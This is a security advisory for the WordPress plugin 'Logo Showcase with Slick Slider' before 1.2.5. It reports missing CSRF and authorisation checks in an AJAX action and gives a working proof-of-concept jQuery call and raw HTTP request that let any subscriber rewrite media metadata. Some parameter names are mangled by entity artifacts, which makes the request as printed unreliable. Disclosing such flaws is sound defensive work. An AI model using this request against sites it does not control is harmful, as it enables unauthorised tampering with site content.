Logo Showcase with Slick Slider < 1.2.5 - Subscriber+ Arbitrary Media Title/Description/Alt Text/URL Update

The plugin does not have CSRF and authorisation checks in the lswss_save_attachment_data AJAX action, allowing any authenticated users, such as Subscriber, to change title, description, alt text, and URL of arbitrary uploaded media.

PoC

jQuery.post(ajaxurl,{ action: “lswss_save_attachment_data”, attachment_id: 564, form_data: “lswss_attachment_title=Test&lswss;_attachment_desc=Changed%20by%20subscriber&lswss;_attachment_alt=Alt%20text&lswss;_attachment_link=” }) POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: / Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 213 Connection: close Cookie: [any authenticated user] action=lswss_save_attachment_data&attachment;_id=2133&form;_data=lswss_attachment_title%3DTest%26lswss_attachment_desc%3DChanged%2520by%2520subscriber%26lswss_attachment_alt%3DAlt%2520text%26lswss_attachment_link%3D